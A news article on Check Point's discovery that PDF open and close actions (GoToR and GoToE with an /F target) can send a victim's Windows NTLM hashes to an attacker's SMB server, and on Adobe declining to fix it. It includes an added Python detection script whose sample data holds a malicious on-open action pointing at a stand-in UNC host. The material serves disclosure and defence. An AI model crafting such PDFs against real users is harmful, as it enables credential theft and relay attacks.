Here are the big takeaways:
- Security firm Check Point Research has revealed its discovery of a fundamental flaw in the structure of PDFs that could allow an attacker to steal Windows NTLM hashes and expose passwords.
- Check Point said that Adobe declined to fix the issue, instead referring concerned users to a Microsoft Security Bulletin from 2017 for a workaround.
The exploit lies deep in the structure of PDF files: an affected file only has to be opened for NT LAN Manager (NTLM) hashes to be copied to a remote source.
NTLM hashes are hashed password values that are stored on domain controllers. They’re part of every SMB request and are encrypted, but there is no shortage of NTLM hash decryption tools available.
Check Point contacted Adobe to report the vulnerability, and the company said it has no plans to fix the issue, instead referring users to a Microsoft Security Advisory from 2017 containing instructions on how to disable NTLM single sign-on (SSO). Check Point also reached out to Foxit, publishers of a popular Acrobat alternative, but received no response.
A fundamental flaw in PDFs
As explained by Check Point Research, PDFs contain eight object types. The one being exploited in this case is the dictionary object.
Dictionaries contain entries consisting of two objects: a key and a value. Keys are names, and values can be absolutely anything.
Inside of an entry called /AA are actions that specify particular things to be done when PDFs are opened (triggered by the /O entry) or closed (triggered by /C). Beneath the open/close entry is another set of actions: /S, /F, and /D—those are what are being used to trigger this particular NTLM hash theft exploit.
/S specifies the kind of action to be performed when a PDF is opened or closed. Two particular actions are used in this exploit to direct the PDF to pull up a remote source: go to remote (GoToR), which can directly pull up a remote source, and go to embedded (GoToE), which can direct a PDF to a bit of injected code specified by the /D action.
The /F action specifies a location to be opened by GoToR or GoToE. In this exploit it’s an attacker’s SMB server, which triggers transmission of the victim’s NTLM hash, challenge, user, host name, and domain details. Once that data is stolen, Check Point said, the attacker can use their SMB server to launch other SMB relay attacks as well.
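An added example, not from Check Point or the original article: a Python triage check for the structure described above, an /AA entry whose /O or /C action is GoToR or GoToE and whose /F target is a UNC path. The function names and the sample bytes are constructed for illustration, and the check assumes uncompressed objects with /F written as a literal string, so objects stored in compressed streams are not seen.

```python
import re

# Constructed sample: two page objects, one with a UNC target, one with a local file.
SAMPLE = rb"""1 0 obj
<< /Type /Page /AA << /O << /F (\\\\fileserver.example.test\\share) /D [0 /Fit] /S /GoToE >> >> >>
endobj
3 0 obj
<< /Type /Page /AA << /C << /S /GoToR /F (appendix.pdf) /D [0 /Fit] >> >> >>
endobj
"""

REMOTE_ACTIONS = {b"GoToR", b"GoToE"}        # action types named in the article
AA_OPEN = re.compile(rb"/AA\s*<<")           # additional-actions dictionary
TRIGGER_OPEN = re.compile(rb"/([OC])\s*<<")  # /O = on open, /C = on close
ACTION_TYPE = re.compile(rb"/S\s*/(\w+)")    # /S names the action type
F_LITERAL = re.compile(rb"/F\s*\(((?:\\.|[^\\()])*)\)")  # /F as a literal string

def dict_span(data, start):
    """Return the dictionary whose '<<' sits at `start`, honouring nesting."""
    depth, i = 0, start
    while i < len(data) - 1:
        if data[i:i + 2] == b"<<":
            depth, i = depth + 1, i + 2
        elif data[i:i + 2] == b">>":
            depth, i = depth - 1, i + 2
            if depth == 0:
                return data[start:i]
        else:
            i += 1
    return data[start:]  # unterminated dictionary: scan what is there

def find_unc_actions(data):
    """List (trigger, action, target) for open/close actions that point at a UNC path."""
    findings = []
    for aa in AA_OPEN.finditer(data):
        aa_dict = dict_span(data, aa.end() - 2)
        for trig in TRIGGER_OPEN.finditer(aa_dict):
            action = dict_span(aa_dict, trig.end() - 2)
            kind, target = ACTION_TYPE.search(action), F_LITERAL.search(action)
            if not kind or kind.group(1) not in REMOTE_ACTIONS or not target:
                continue
            # A PDF literal string writes each backslash as "\\": undo that first.
            path = re.sub(rb"\\([\\()])", rb"\1", target.group(1))
            if path.startswith(b"\\\\"):  # \\host\share means an SMB connection
                findings.append((trig.group(1).decode(), kind.group(1).decode(),
                                 path.decode("latin-1")))
    return findings

if __name__ == "__main__":
    for trigger, action, target in find_unc_actions(SAMPLE):
        print(f"/AA /{trigger}: {action} -> {target}")
```

A hit is a reason to quarantine the file and inspect it with a full PDF parser; a clean result does not clear a file whose objects are compressed.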
The exploit Check Point details is a troubling one since it deals with the basic structure of PDFs themselves. Attacks could be embedded into legitimate PDFs by third parties and used to harvest a nearly limitless amount of data—anything that particular user’s Windows credentials would give them access to.
It’s understandable that Adobe may not want to take action to fix this flaw in PDF design: It runs deep. Network administrators who rely on NTLM SSO authentication should seriously consider implementing Microsoft’s proposed changes to prevent this kind of attack from happening to their network.
It’s unfortunate that potential victims are the ones being forced to take action in this case, especially given the fact that many major security incidents are due to unapplied patches to known issues. In those cases it’s more forgivable since patches are relatively automatic: This fix requires changing registry keys and editing Group Policy settings instead of simply applying an automated patch.
Let’s hope Adobe isn’t forced to admit its mistake when a major NTLM hash theft happens. It may require a lot of work to fix, but it would be much more comforting to PDF users than kicking the can down the road.